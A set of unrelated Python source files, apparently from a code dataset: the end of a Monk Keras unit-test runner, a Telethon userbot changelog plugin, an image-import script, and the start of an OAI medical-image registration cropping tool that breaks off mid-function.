print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nesterov_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nadam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adamax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adadelta(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adagrad(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_kldiv(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_squared_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
from monk.pip_unit_tests.keras.test_layer_convolution1d import test_layer_convolution1d
from monk.pip_unit_tests.keras.test_layer_convolution2d import test_layer_convolution2d
from monk.pip_unit_tests.keras.test_layer_convolution3d import test_layer_convolution3d
from monk.pip_unit_tests.keras.test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
from monk.pip_unit_tests.keras.test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from monk.pip_unit_tests.keras.test_layer_max_pooling1d import test_layer_max_pooling1d
from monk.pip_unit_tests.keras.test_layer_max_pooling2d import test_layer_max_pooling2d
from monk.pip_unit_tests.keras.test_layer_max_pooling3d import test_layer_max_pooling3d
from monk.pip_unit_tests.keras.test_layer_average_pooling1d import test_layer_average_pooling1d
from monk.pip_unit_tests.keras.test_layer_average_pooling2d import test_layer_average_pooling2d
from monk.pip_unit_tests.keras.test_layer_average_pooling3d import test_layer_average_pooling3d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from monk.pip_unit_tests.keras.test_layer_batch_normalization import test_layer_batch_normalization
from monk.pip_unit_tests.keras.test_layer_identity import test_layer_identity
from monk.pip_unit_tests.keras.test_layer_fully_connected import test_layer_fully_connected
from monk.pip_unit_tests.keras.test_layer_dropout import test_layer_dropout
from monk.pip_unit_tests.keras.test_layer_flatten import test_layer_flatten
from monk.pip_unit_tests.keras.test_layer_concatenate import test_layer_concatenate
from monk.pip_unit_tests.keras.test_layer_add import test_layer_add
from monk.pip_unit_tests.keras.test_activation_relu import test_activation_relu
from monk.pip_unit_tests.keras.test_activation_softmax import test_activation_softmax
from monk.pip_unit_tests.keras.test_activation_thresholded_relu import test_activation_thresholded_relu
from monk.pip_unit_tests.keras.test_activation_elu import test_activation_elu
from monk.pip_unit_tests.keras.test_activation_prelu import test_activation_prelu
from monk.pip_unit_tests.keras.test_activation_leaky_relu import test_activation_leaky_relu
from monk.pip_unit_tests.keras.test_activation_selu import test_activation_selu
from monk.pip_unit_tests.keras.test_activation_softplus import test_activation_softplus
from monk.pip_unit_tests.keras.test_activation_softsign import test_activation_softsign
from monk.pip_unit_tests.keras.test_activation_tanh import test_activation_tanh
from monk.pip_unit_tests.keras.test_activation_sigmoid import test_activation_sigmoid
from monk.pip_unit_tests.keras.test_activation_hard_sigmoid import test_activation_hard_sigmoid
from monk.pip_unit_tests.keras.test_initializer_xavier_normal import test_initializer_xavier_normal
from monk.pip_unit_tests.keras.test_initializer_xavier_uniform import test_initializer_xavier_uniform
from monk.pip_unit_tests.keras.test_initializer_random_normal import test_initializer_random_normal
from monk.pip_unit_tests.keras.test_initializer_random_uniform import test_initializer_random_uniform
from monk.pip_unit_tests.keras.test_initializer_lecun_normal import test_initializer_lecun_normal
from monk.pip_unit_tests.keras.test_initializer_lecun_uniform import test_initializer_lecun_uniform
from monk.pip_unit_tests.keras.test_initializer_he_normal import test_initializer_he_normal
from monk.pip_unit_tests.keras.test_initializer_he_uniform import test_initializer_he_uniform
from monk.pip_unit_tests.keras.test_initializer_truncated_normal import test_initializer_truncated_normal
from monk.pip_unit_tests.keras.test_initializer_orthogonal import test_initializer_orthogonal
from monk.pip_unit_tests.keras.test_initializer_variance_scaling import test_initializer_variance_scaling
from monk.pip_unit_tests.keras.test_block_resnet_v1 import test_block_resnet_v1
from monk.pip_unit_tests.keras.test_block_resnet_v2 import test_block_resnet_v2
from monk.pip_unit_tests.keras.test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from monk.pip_unit_tests.keras.test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from monk.pip_unit_tests.keras.test_block_resnext import test_block_resnext
from monk.pip_unit_tests.keras.test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from monk.pip_unit_tests.keras.test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from monk.pip_unit_tests.keras.test_block_squeezenet_fire import test_block_squeezenet_fire
from monk.pip_unit_tests.keras.test_block_densenet import test_block_densenet
from monk.pip_unit_tests.keras.test_block_conv_bn_relu import test_block_conv_bn_relu
from monk.pip_unit_tests.keras.test_block_inception_a import test_block_inception_a
from monk.pip_unit_tests.keras.test_block_inception_b import test_block_inception_b
from monk.pip_unit_tests.keras.test_block_inception_c import test_block_inception_c
from monk.pip_unit_tests.keras.test_block_inception_d import test_block_inception_d
from monk.pip_unit_tests.keras.test_block_inception_e import test_block_inception_e
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_batch_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_identity(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_fully_connected(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_dropout(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_flatten(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softmax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_thresholded_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_elu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_prelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_leaky_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_selu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softplus(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softsign(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_tanh(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_hard_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_concatenate(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_add(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_truncated_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_variance_scaling(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
|
python
|
"""
.log to view bot log
For all users
"""
import asyncio
from telethon import events
from telethon.tl.types import ChannelParticipantsAdmins
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern="log"))
@borg.on(events.NewMessage(pattern=r"\.log(.*)",incoming=True))
async def _(event):
if event.fwd_from:
return
mentions = """**αℓℓυкα Zᴏʟᴅʏᴄᴋ™** //logs\n\n//8th feb 2020//\n• Fix `.kang` double reply.\n• Added new plugin `. into ur count` To view my stats 😉 **FOR SUDO USER ONLY**\n\n//10th feb 2020//\n• Added `.ai` (Your message) AI chat Bot 😉 [BUT VERY SLOW TO REPLY 😕]\n\n//11th Feb 2020//\n• Added `.slap` in reply to any message, or u gonna slap urself.\n• Added `.rnupload` file.name\n\n//12th feb 2020// \n• Added `.ft` (any emoji)
\n//13 March 2020//\n• Change prefix .ud to .mean \n• Added `.rrgb` Random RGB text Sticker\n• Added `.tagall` to tag all ppl in chat \n• Added `.commit` to upload plugins into ur github ripo (SUDO ONLY)
//26 March 2020//
•Added `.decide` to get ans YES or NO
•Added `.paste`paste bin
•Added `.userlist` to get all users in your chat.
•Added `.setwelcome` set welcome message in your chat.
•Added `.clearwelcome` disbale welcome message in your chat.
"""
chat = await event.get_input_chat()
async for x in borg.iter_participants(chat, filter=ChannelParticipantsAdmins):
mentions += f""
reply_message = None
if event.reply_to_msg_id:
reply_message = await event.get_reply_message()
await reply_message.reply(mentions)
else:
await event.reply(mentions)
await event.delete()
|
python
|
import rigor.importer
import argparse
def main():
parser = argparse.ArgumentParser(description='Imports images and metadata into the database')
parser.add_argument('database', help='Database to use')
parser.add_argument('directories', metavar='dir', nargs='+', help='Directory containing images and metadata to import')
parser.add_argument('-m', '--move', action="store_true", dest='move', default=False, help='Move files into repository instead of copying')
args = parser.parse_args()
for directory in args.directories:
i = rigor.importer.Importer(directory, args.database, args.move)
i.run()
if __name__ == '__main__':
main()
|
python
|
"""
this is a transfer tool for existed oai data (train, val , test, debug)
it will crop the image into desired size
include two part
crop the data and save it into new direc ( the code will be based on dataloader)
generate a new directory which should provide the same train,val,test and debug set, but point to the cropped data
"""
from __future__ import print_function, division
import sys
import os
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../model_pool'))
from easyreg.reg_data_utils import *
from multiprocessing import *
import SimpleITK as sitk
num_of_workers = 12
import progressbar as pb
from easyreg.utils import *
class RegistrationDataset(object):
"""registration dataset."""
def __init__(self, data_path, phase=None, resize_factor=[1., 1., 1.]):
"""
the dataloader for registration task, to avoid frequent disk communication, all pairs are compressed into memory
:param data_path: string, path to the data
the data should be preprocessed and saved into txt
:param phase: string, 'train'/'val'/ 'test'/ 'debug' , debug here means a subset of train data, to check if model is overfitting
:param transform: function, apply transform on data
: seg_option: pars, settings for segmentation task, None for registration task
: reg_option: pars, settings for registration task, None for segmentation task
"""
self.data_path = data_path
self.task_output_path = None
self.data_output_path = None
self.real_img_path = None
self.real_label_path = None
self.running_read_path = None
self.phase = phase
self.data_type = '*.nii.gz'
self.turn_on_pair_regis = False
self.max_num_pair_to_load = [-1, -1, -1, -1]
""" the max number of pairs to be loaded into the memory"""
self.has_label = False
self.shared_label_set = None
self.get_file_list()
self.resize_factor = resize_factor
self.resize = not all([factor == 1 for factor in self.resize_factor])
self.pair_list = []
def process(self):
self.transfer_exist_dataset_txt_into_new_one()
#self.process_img_pool()
def set_task_output_path(self, path):
self.task_output_path = path
os.makedirs(path, exist_ok=True)
def set_data_output_path(self, path):
self.data_output_path = path
os.makedirs(path, exist_ok=True)
def set_real_data_path(self, img_path, label_path):
self.real_img_path = img_path
self.real_label_path = label_path
def set_running_read_path(self, running_read_path):
self.running_read_path = running_read_path
def set_shared_label(self, shared_label_set):
self.shared_label_set = shared_label_set
def get_file_list(self):
"""
get the all files belonging to data_type from the data_path,
:return: full file path list, file name list
"""
if not os.path.exists(self.data_path):
self.path_list = []
self.name_list = []
return
self.path_list = read_txt_into_list(os.path.join(self.data_path, 'pair_path_list.txt'))
self.name_list = read_txt_into_list(os.path.join(self.data_path, 'pair_name_list.txt'))
if len(self.path_list[0]) == 4:
self.has_label = True
if len(self.name_list) == 0:
self.name_list = ['pair_{}'.format(idx) for idx in range(len(self.path_list))]
if self.phase == 'test':
self.path_list = [[pth.replace('zhenlinx/Data/OAI_segmentation', 'zyshen/oai_data') for pth in pths] for
pths in
self.path_list]
def transfer_exist_dataset_txt_into_new_one(self):
source_path_list, target_path_list, l_source_path_list, l_target_path_list = self.split_file_list()
file_num = len(source_path_list)
assert len(source_path_list) == len(target_path_list)
if l_source_path_list is not None and l_target_path_list is not None:
assert len(source_path_list) == len(l_source_path_list)
file_list = [[source_path_list[i], target_path_list[i], l_source_path_list[i], l_target_path_list[i]] for i
in range(file_num)]
else:
